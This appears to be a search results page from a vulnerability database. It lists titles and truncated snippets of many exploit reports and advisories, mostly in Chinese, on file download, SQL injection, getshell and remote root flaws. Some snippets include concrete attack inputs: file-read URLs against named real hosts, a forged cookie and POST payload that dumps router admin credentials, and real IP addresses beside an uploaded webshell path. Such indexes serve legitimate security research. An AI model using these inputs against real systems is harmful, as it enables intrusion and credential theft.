56796 matches found
正方协同办公系统/zfoa/gwxxbviewhtml.do任意文件下载漏洞
0x01 系统介绍 正方协同办公系统的设计目标是帮助各部门快速构建起一个安全、可靠、易用的文档一体化办公环境,实现公文处理的自动化,同时作为内部通讯和信息共享的平台。 系统的特点如下: (1)简单易用:实现快速部署,轻松办公 符合日常办公习惯的界面和操作,通过简单的使用培训,使用人员即可了解系统中的相关办公设置,并可应用系统进行办公。 (2)灵活的自定义功能,满足个性与变化的需求 组织机构、表单格式、工作流程、访问权限、打印格式、统计等全面提供自定义,能够很好的满足各单位现在和未来的办公自动化需求。 (3)多层次的安全设计,为办公自动化提供保障...
MidiCart PHP Item_List.PHP Maingroup Parameter Cross-Site Scripting Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/13518/info MidiCart PHP is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage this issue to have arbitrary...
youke365 V1.0.7 SQL注入
...
MetInfo6.0.0任意用户密码修改
...
MetInfo6.0.0任意文件读取漏洞
...
Maccms V8 后台Getshell #2(绕过过滤)
简要描述: 现在 V8版本 基本全部文件都有zend加密了。 而且还有360safe3.php保护 刚开始以为没搞头的,结果有个妹子发来微信。 妹子:在干嘛? 我:挖洞 妹子:一个人挖? 我:对啊! 妹子:我过去陪你一起挖吧! 我马上关机。擦,想跟老子抢乌云币?果断一个人作死开挖 详细说明: 注意下,这里@农村教师 WooYun: 苹果CMS全版本getshell打包第一弹 之前提交过类似的后台getshell,但是修补了。。。 不废话,直接可耻的绕过它 1. 目录浏览 maccms后台有个接口,但是限制了,只能访问目录template里的文件...
MetInfo6.1.0后台update注入(四)
...
MetInfo6.0.0后台任意文件读取下载
...
MediaXxx Adult Video / Media Script SQL Injection
No description provided by source...
JamMail 1.8 Jammail.pl Remote Arbitrary Command Execution Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/13937/info JamMail is prone to a remote arbitrary command execution vulnerability. This vulnerability may allow an attacker to supply arbitrary commands through the 'jammail.pl' script. This can lead to various attacks...
MetInfo6.0任意文件读取
...
MetInfo6.0.0后台sql注入
...
metinfo6.0.0后台update注入(三)
...
metinfo6.0.0后台sql注入
...
金蝶协同办公平台任意文件下载漏洞(无需登录)
简要描述: 金蝶协同办公平台任意文件下载漏洞(无需登录) 详细说明: 经测试发现,该系统存在任意文件下载,且无需登录 存在漏洞的文件: /oa/admin/application/filedownload.jsp?filePath= 部分漏洞代码为: 很明显的任意文件下载漏洞,随便在网上找一个实例进行证明 http://oa.xpngs.com/oa/admin/application/filedownload.jsp?filePath=c:\windows\win.ini 直接访问即可下载该文件了,保存的文件...
Wordpress admin-ajax.php远程SQL注入漏洞
WordPress是一款免费的论坛Blog系统。 WordPress实现上存在输入验证漏洞,远程攻击者可能利用此漏洞执行SQL注入攻击非授权访问数据库。 WordPress的wp-admin/admin-ajax.php文件没有正确验证对cookie参数的输入。在wp-admin/admin-ajax.php的6行: ------------------source code---------------------- define'DOINGAJAX', true; checkajaxreferer; if !isuserloggedin die'-1';...
VMware ESX Service Console多个安全漏洞
CVE ID: CVE-2005-4268,CVE-2010-0624,CVE-2007-4476,CVE-2010-2063,CVE-2010-1321,CVE-2010-1168,CVE-2010-1447,CVE-2008-5302,CVE-2008-5303 VMware ESX Server是为适用于任何系统环境的企业级虚拟计算机软件。 ESX Console OS COS在cpio、tar、perl、krb5、samba等应用的实现上存在多个漏洞,其中最严重的漏洞可造成服务器拒绝服务或执行任意代码。 0 VMWare ESX Server 厂商补丁: VMWare -----...
Netgear DGN2200v1 远程命令执行
Exploit Title: Netgear DGN2200v1 - Remote Command Execution RCE Unauthenticated Date: 02.07.2021 Exploit Author: SivertPL Vendor Homepage: https://www.netgear.com/ Version: All prior to v1.0.0.60 !/usr/bin/python """ NETGEAR DGN2200v1 Unauthenticated Remote Command Execution Author: SivertPL...
Virata EmWeb R6.0.1 - Remote Crash Vulnerability
No description provided by source. Exploit Title: Virata EmWeb R6.0.1 Remote Crash Vulnerability Date: 06/04/10 Author: Jobert Abma Online 24 Email: j.abmaatonline24dotnl Version: R6.0.1 Tested on: linux CVE : Code : This was written for educational purpose. Use it at your own risk. Author will b...
Apple Mac OS X 2008-002更新修复多个安全漏洞
BUGTRAQ ID: 28304 CVECAN ID:...
Cisco RV132W Multiple Vulnerabilities(CVE-2018-0125/CVE-2018-0127)
Vulnerabilities Summary The following advisory describes two 2 vulnerabilities found in Cisco RV132W Wireless N VPN version 1.0.1.8 The Cisco RV132W Wireless-N ADSL2+ VPN Router is “easy to use, set up, and deploy. This flexible router offers great performance and is suited for small or home...
用友ERP-NC系统/NCFindWeb接口任意文件下载
该漏洞权限比较大,可以获取数据库,/etc/passwd等信息,漏洞存在链接: http://vul/NCFindWeb?service=IPreAlertConfigService&filename=../../ierp/bin/prop.xml 可以读取到数据库密码,如图: 也可以读取/etc/passwd,如图: 中粮集团,民生电商等大量企业受到影响...
Sun Solaris IP实现远程拒绝服务漏洞
Solaris是一款由Sun开发和维护的商业性质UNIX操作系统。 Solaris 8/9的IP实现上存在安全漏洞,远程非特权用户可能利用此漏洞通过发送特制IP报文降低联网Solaris系统的性能。 Solaris系统上可见大量的伪造IP碎片和/或大量的IP碎片重组失败。例如,运行以下命令: % /usr/bin/netstat -s | /usr/bin/egrep 'ReasmDuplicates|ReasmFails' 可能显示很高的ipv6ReasmDuplicates和ipv6ReasmFails计数器值。 此外,单处理器的Solaris...
TP-Link 路由器命令注入漏洞(CVE-2017-16957)
0x01 背景 TP-Link TL-WVR 等都是中国普联(TP-LINK)公司的无线路由器产品。 多款 TP-Link 系列产品存在命令注入漏洞,攻击者在登录后可发送恶意字段,经拼接后导致任意命令执行。 该漏洞由 coincoin7 发现,漏洞编号 CVE-2017-16957 0x02 受影响产品 TP-LINK TL-WVR 系列 TP-LINK TL-WAR 系列 TP-LINK TL-ER 系列 TP-LINK TL-R 系列 0x03 漏洞分析 根据原文提供的链接,下载了 TL-WVR450L 的固件,使用 binwalk 解包,拿到 squashfs 系统文件,再用...
Apache HTTP Server HTTP-Basic认证绕过漏洞
Bugraq ID: 35840 CNCAN ID:CNCAN-2009072903 Apache HTTP Server是一款流行的WEB服务程序。 Apache HTTP Server存在HTTP-Basic认证绕过问题,远程攻击者可以利用漏洞访问受资源,获得敏感信息。 当用户要访问需要认证的资源时Apache HTTP Server会返回"401 Authorization Required"消息,也会包含提示需要哪种认证机制的HTTP消息,"Basic"认证是最通用的一种,基于BASE64编码的字符串:username:password,如果凭据正确,WEB服务器将返回"200...
金窗教务系统 /install/mzzup.asp 目录遍历
No description provided by source...
DirectAdmin 'mysql_backup'文件夹信息泄露漏洞
Bugtraq ID: 47693 DirectAdmin是一款功能强大的虚拟主机在线管理系统。 DirectAdmin把MySQL数据库备份文件创建在全局可读的"mysqlbackups"文件夹中,可导致泄露MySQL数据库备份内容。 要成功利用漏洞需要CustomBuild用于更新MySQL数据库,并且"mysqlbackup"设置为"yes"。 JBMC Software DirectAdmin 1.33.6 JBMC Software DirectAdmin 1.33.4 JBMC Software DirectAdmin 1.33.3 JBMC Software...
Outlook Home Page – Another Ruler Vector
Ruler has become a go to tool for us on external engagements, easily turning compromised mailbox credentials into shells. This has resulted in security being pushed forward and Microsoft responding with patches for the two vectors used in Ruler, namely rules and forms. These were patched with...
sudo 1.8.0-1.8.3p1 (sudo_debug) - Root Exploit + glibc FORTIFY_SOURCE Bypass
No description provided by source. / death-star.c sudo v1.8.0-1.8.3p1 sudodebug format string root exploit + glibc FORTIFYSOURCE bypass by aeon - http://infosecabsurdity.wordpress.com/ This PoC exploits: - CVE-2012-0864 - FORTIFYSOURCE format string protection bypass via nargs integer overflow -...
Postfix SMTP - Shellshock Exploit
No description provided by source. !/bin/python Exploit Title: Shellshock SMTP Exploit Date: 10/3/2014 Exploit Author: fattymcwopr Vendor Homepage: gnu.org Software Link: http://ftp.gnu.org/gnu/bash/ Version: 4.2.x 4.2.48 Tested on: Debian 7 postfix smtp server w/procmail CVE : 2014-6271 from...
DedeCMS 5.7 /plus/flink_add.php SQL注入漏洞
common.inc.php这里开始过滤得很完整,往下看//转换上传的文件相关的变量及安全处理、并引用前台通用的上传函数PHPphp if$FILES requireonceDEDEINC.'/uploadsafe.inc.php'; uploadsafe.inc.php//29行 $$key = $FILES$key'tmpname' = strreplace"\\", "\", $FILES$key'tmpname'; 能绕过 GPCplus\flink.php虽然都经过...
Dnsmasq Stack based overflow(CVE-2017-14493)
1 Build the docker and open two terminals docker build -t dnsmasq . docker run --rm -t -i --name dnsmasqtest dnsmasq bash docker cp poc.py dnsmasqtest:/poc.py docker exec -it bash 2 On one terminal start dnsmasq: /test/dnsmasqnoasn/src/dnsmasq --no-daemon --dhcp-range=fd00::2,fd00::ff dnsmasq:...
SX Design sipd 0.1.2/0.1.4 - Remote Format String Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/9236/info sipd has been reported prone to a format string vulnerability that may be triggered remotely. It has been reported that sip URI arguments passed to the affected server are not sufficiently handled. An attacker m...
storytlr "search"跨站脚本漏洞
storytlr是一款博客平台。 由于通过"search"参数传递到index.php/search/的输入在protected/application/public/controllers/SearchController.php中被返回用户前未能正确过滤,攻击者可以利用漏洞在受影响站点上下文的用户浏览器会话中执行任意HTML和脚本代码。 0 storytlr 1.2 目前厂商暂无提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: http://storytlr.org/...
OpenSSL 拒绝服务攻击(CVE-2021-3449)
...
MetInfo5.1 任意文件上传漏洞(可getshell)
No description provided by source...
用友NC综合办公系统 /service/~iufo/com.ufida.web.action.ActionServlet 用户信息泄露
No description provided by source...
GNU InetUtils ftpd 1.4.2 (ld.so.preload) Remote Root Exploit
No description provided by source. FTP server GNU inetutils 1.4.2 Remote Root Exploit This program remotely exploits the most recent versions of GNU inetutils ftpd on linux systems. Requirements: 1. There MUST be a chroot'ed environment for the logged in user 2. Directory etc must be writeable by...
Samba NetLogon未初始化指针漏洞(CVE-2015-0240)
No description provided by source. !/usr/bin/env python coding: utf-8 import sys import time from struct import pack,unpack import argparse import impacket from impacket.dcerpc.v5 import transport, nrpc from impacket.dcerpc.v5.ndr import NDRCALL from impacket.dcerpc.v5.dtypes import WSTR class...
WeBid 1.0.6 - SQL Injection Vulnerability
No description provided by source. Exploit Title: WeBid 1.0.6 SQL Injection Vulnerability Google Dork: Powered by WeBid Date: 1/9/13 Exploit Author: Life Wasted Vendor Homepage: http://www.webidsupport.com/ Version: Tested on 1.0.6, but could affect other version Tested On: Linux, Windows...
apache2 vulnerabilities
No description provided by source. =========================================================== Ubuntu Security Notice USN-860-1 November 19, 2009 apache2 vulnerabilities CVE-2009-3094, CVE-2009-3095, CVE-2009-3555 =========================================================== A security issue affect...
Exchange ProxyOracle 信息泄露漏洞利用链(CVE-2021-31195、 CVE-2021-31196)
...
PHP Links <= 1.3 (vote.php id) Remote SQL Injection Vulnerability
No description provided by source. ------------------------------------------------------------- ----- H-T Team HouSSaMix + ToXiC350 from MoroCCo -------- ------------------------------------------------------------- = Author : Houssamix From H-T Team = Script : PHP Links from DeltaScripts = 1.3 ...
Git for Visual Studio远程执行代码漏洞(CVE-2021-21300)
...
Sendmail with clamav-milter < 0.91.2 - Remote Root Exploit
No description provided by source. black-hole.pl Sendmail w/ clamav-milter Remote Root Exploit Copyright c 2007 Eliteboy use IO::Socket; print Sendmail w/ clamav-milter Remote Root Exploit\n; print Copyright C 2007 Eliteboy\n; if $ARGV != 0 print Give me a host to connect.\n;exit; print Attacking...
phpems前台某4处getshell漏洞
简要描述: phpems前台某4处getshell漏洞 详细说明: 2.phpems前台某4处getshell漏洞 存在漏洞的代码在/app/document/api.php的upload,uploadfile,swupload,swfuploadvideo这四个函数上,因为这四个函数都是处理上传文件的,而且处理方式都一模一样,所以均存在任意文件上传漏洞 首先这四个函数通过注册用户登录,调整URL参数均可以访问到 接下来我以 public function swfuploadvideo $path = 'files/attach/images/content/'.date'Ymd'.'/...
Microsoft Windows WSDAPI服务远程内存破坏漏洞(MS09-063)
BUGTRAQ ID: 36919 CVE ID: CVE-2009-2512 Microsoft Windows是微软发布的非常流行的操作系统。 Windows系统中设备API上Web服务(WSDAPI)中存在内存破坏漏洞。远程攻击者可以通过向WSDAPI服务发送带有畸形头的WSD消息触发这个漏洞,导致在用户系统上执行任意指令。 Microsoft Windows Vista SP2 Microsoft Windows Vista SP1 Microsoft Windows Vista Microsoft Windows Server 2008 SP2 Microsoft Window...
Mac OS X 2007-007更新修复多个安全漏洞
CVECAN ID:...
用友某重要系统任意文件上传漏洞之二
简要描述: 用友某重要系统任意文件上传漏洞之二 详细说明: 用友GRP-U8 财务管理软件 该servlet存在漏洞,可直接上传任意文件到服务器 None 这里为:http://210.44.112.101https://images.seebug.org/upload/chopper.jsp chopper 5个案例: http://210.44.112.101/UploadFile http://124.128.96.98:8001/UploadFile http://61.139.105.105:8008/UploadFile...
Ruijie Router NBR 信息泄漏漏洞
使用ModifyHeaders修改Cookie头为:auth=Z3Vlc3Q6Z3Vlc3Q%3D; user=guest;使用Hackbar发送POST包到:http://localhost/WEBVMS/LEVEL15/内容为:command=show%20webmaster%20users%0D%0A&strurl=exec%04&mode=%02PRIVEXEC&signname=Red-Giant. 得到admin的帐号密码。 !/usr/bin/env python coding: utf-8 import re from pocsuite.net import req fr...